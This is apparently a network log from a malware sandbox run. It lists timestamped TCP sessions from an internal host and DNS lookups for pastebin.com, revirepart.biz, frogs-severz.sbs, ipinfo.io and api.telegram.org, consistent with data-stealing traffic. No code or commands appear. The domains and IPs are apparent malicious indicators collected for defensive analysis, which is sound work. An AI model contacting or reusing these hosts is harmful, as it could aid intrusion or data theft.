                                                                                                                                                          Nov 23, 2024 12:47:25.384969950 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:25.385049105 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:25.385202885 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:26.072576046 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:26.072817087 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:26.072882891 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:26.075042963 CET49741443192.168.2.4172.67.184.174
                                                                                                                                                          Nov 23, 2024 12:47:26.075066090 CET44349741172.67.184.174192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:26.575145006 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:26.575191975 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:26.575284958 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:26.575887918 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:26.575917959 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:27.796180010 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:27.796297073 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:27.800462961 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:27.800497055 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:27.800920963 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:27.803416967 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:27.803544998 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:27.803582907 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:28.498003960 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:28.498262882 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:28.498331070 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:28.504858971 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:28.504906893 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:28.504935980 CET49744443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:28.504952908 CET44349744104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:28.656552076 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:28.656579971 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:28.656651020 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:28.661761999 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:28.661775112 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:29.882132053 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:29.882268906 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:29.883622885 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:29.883635044 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:29.883836985 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:29.892131090 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:29.892205000 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:29.892286062 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.610925913 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.611063957 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.611181021 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.611237049 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.611257076 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.611315966 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.611321926 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.611447096 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.611536980 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.611586094 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.611593962 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.611628056 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.618925095 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.627346992 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.630521059 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.630530119 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.672797918 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.672806025 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.719634056 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.730676889 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.782135963 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.802186012 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.802385092 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.802479029 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.802490950 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.802618027 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.802818060 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.802866936 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.802881956 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.802891970 CET49747443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.802900076 CET44349747104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.953701973 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.953747988 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:30.953840971 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.954272985 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:30.954304934 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:32.221426010 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:32.221520901 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:32.222870111 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:32.222903013 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:32.223249912 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:32.224522114 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:32.224683046 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:32.224726915 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:32.224802971 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:32.224818945 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:33.068965912 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:33.069216013 CET44349748104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:33.069437981 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:33.069437981 CET49748443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:33.207850933 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:33.207890987 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:33.207988977 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:33.208334923 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:33.208353043 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:34.437397003 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:34.437519073 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:34.438998938 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:34.439013004 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:34.439385891 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:34.440721035 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:34.440896988 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:34.440936089 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:35.201395988 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:35.201632977 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:35.201684952 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:35.201731920 CET49749443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:35.201749086 CET44349749104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:35.455169916 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:35.455231905 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:35.455306053 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:35.455643892 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:35.455662012 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:36.720293045 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:36.720381975 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:36.721649885 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:36.721666098 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:36.722035885 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:36.723275900 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:36.723450899 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:36.723490000 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:36.723546982 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:36.723560095 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:37.605357885 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:37.605623960 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:37.605675936 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:37.605784893 CET49751443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:37.605803967 CET44349751104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:38.250832081 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:38.250910044 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:38.251003981 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:38.251373053 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:38.251405954 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:39.525068045 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:39.525155067 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:39.526496887 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:39.526525974 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:39.526932955 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:39.528182030 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:39.528276920 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:39.528290033 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:40.236701965 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:40.236946106 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:40.237015963 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:40.237257957 CET49752443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:40.237282991 CET44349752104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:40.659241915 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:40.659301043 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:40.659379005 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:40.660136938 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:40.660162926 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:41.971949100 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:41.972081900 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:41.973910093 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:41.973927021 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:41.974140882 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:41.981420040 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:41.981554031 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:41.981565952 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:43.101064920 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:43.101315022 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:43.101392984 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:43.101464033 CET49754443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:43.101500034 CET44349754104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:43.132278919 CET49756443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:43.132358074 CET44349756104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:43.132473946 CET49756443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:43.132922888 CET49756443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:43.132956028 CET44349756104.21.88.250192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:43.665731907 CET49756443192.168.2.4104.21.88.250
                                                                                                                                                          Nov 23, 2024 12:47:53.937416077 CET49762443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:53.937462091 CET4434976234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:53.937546015 CET49762443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:53.940888882 CET49762443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:53.940918922 CET4434976234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:55.305840015 CET4434976234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:55.305919886 CET49762443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:55.308764935 CET49762443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:55.308790922 CET4434976234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:55.309138060 CET4434976234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:55.316344023 CET49762443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:55.359374046 CET4434976234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:55.774399996 CET4434976234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:55.774605989 CET4434976234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:55.774718046 CET49762443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:55.777194977 CET49762443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:56.542588949 CET49764443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:56.542614937 CET4434976434.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:56.542676926 CET49764443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:56.545764923 CET49764443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:56.545777082 CET4434976434.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:57.771300077 CET4434976434.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:57.771384001 CET49764443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:57.781701088 CET49764443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:57.781712055 CET4434976434.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:57.782094002 CET4434976434.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:57.788729906 CET49764443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:57.835376024 CET4434976434.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:58.284928083 CET4434976434.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:58.285104036 CET4434976434.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:58.285257101 CET49764443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:47:58.285904884 CET49764443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:03.648616076 CET49780443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:03.648691893 CET4434978034.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:03.648838043 CET49780443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:03.655797958 CET49780443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:03.655833006 CET4434978034.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:04.957367897 CET4434978034.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:04.957473993 CET49780443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:04.959810019 CET49780443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:04.959834099 CET4434978034.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:04.960046053 CET4434978034.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:04.985651016 CET49780443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:05.027368069 CET4434978034.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:05.348206043 CET49782443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:05.348246098 CET4434978234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:05.348476887 CET49782443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:05.352118015 CET49782443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:05.352142096 CET4434978234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:05.438040018 CET4434978034.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:05.438092947 CET4434978034.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:05.438177109 CET49780443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:05.439105034 CET49780443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:06.614372969 CET4434978234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:06.614448071 CET49782443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:06.616636038 CET49782443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:06.616656065 CET4434978234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:06.616874933 CET4434978234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:06.623769045 CET49782443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:06.667341948 CET4434978234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:07.077677965 CET4434978234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:07.077760935 CET4434978234.117.59.81192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:07.077835083 CET49782443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:07.082417011 CET49782443192.168.2.434.117.59.81
                                                                                                                                                          Nov 23, 2024 12:48:16.668375015 CET49808443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:16.668416023 CET44349808149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:16.668463945 CET49808443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:16.687097073 CET49808443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:16.687112093 CET44349808149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.157990932 CET44349808149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.158061028 CET49808443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:18.160229921 CET49808443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:18.160244942 CET44349808149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.160567045 CET44349808149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.169640064 CET49808443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:18.215328932 CET44349808149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.420772076 CET49814443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:18.420809031 CET44349814149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.420921087 CET49814443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:18.423573971 CET49814443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:18.423585892 CET44349814149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.753211975 CET44349808149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.753350973 CET44349808149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:18.753407001 CET49808443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:18.754398108 CET49808443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:19.882674932 CET44349814149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:19.882774115 CET49814443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:19.885060072 CET49814443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:19.885077000 CET44349814149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:19.885416031 CET44349814149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:19.894121885 CET49814443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:19.939341068 CET44349814149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:20.561125040 CET44349814149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:20.561280012 CET44349814149.154.167.220192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:20.561331987 CET49814443192.168.2.4149.154.167.220
                                                                                                                                                          Nov 23, 2024 12:48:20.562442064 CET49814443192.168.2.4149.154.167.220
                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Nov 23, 2024 12:47:09.682238102 CET5671153192.168.2.41.1.1.1
                                                                                                                                                          Nov 23, 2024 12:47:09.833345890 CET53567111.1.1.1192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:23.653245926 CET6424153192.168.2.41.1.1.1
                                                                                                                                                          Nov 23, 2024 12:47:23.884520054 CET53642411.1.1.1192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:26.111582994 CET5163453192.168.2.41.1.1.1
                                                                                                                                                          Nov 23, 2024 12:47:26.573940992 CET53516341.1.1.1192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:53.793457985 CET5558953192.168.2.41.1.1.1
                                                                                                                                                          Nov 23, 2024 12:47:53.930401087 CET53555891.1.1.1192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:48:16.512212038 CET6319153192.168.2.41.1.1.1
                                                                                                                                                          Nov 23, 2024 12:48:16.650183916 CET53631911.1.1.1192.168.2.4
                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Nov 23, 2024 12:47:09.682238102 CET192.168.2.41.1.1.10x488Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:23.653245926 CET192.168.2.41.1.1.10x483fStandard query (0)revirepart.bizA (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:26.111582994 CET192.168.2.41.1.1.10xf1d8Standard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:53.793457985 CET192.168.2.41.1.1.10xd887Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:48:16.512212038 CET192.168.2.41.1.1.10x81cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Nov 23, 2024 12:47:09.833345890 CET1.1.1.1192.168.2.40x488No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:09.833345890 CET1.1.1.1192.168.2.40x488No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:09.833345890 CET1.1.1.1192.168.2.40x488No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:23.884520054 CET1.1.1.1192.168.2.40x483fNo error (0)revirepart.biz172.67.184.174A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:23.884520054 CET1.1.1.1192.168.2.40x483fNo error (0)revirepart.biz104.21.43.198A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:26.573940992 CET1.1.1.1192.168.2.40xf1d8No error (0)frogs-severz.sbs104.21.88.250A (IP address)IN (0x0001)false
                                                                                                                                                          Nov 23, 2024 12:47:26.573940992 CET1.1.1.1192.168.2.40xf1d8No error (0)frogs-severz.sbs172.67.155.47A (IP address)IN (0x0001)false
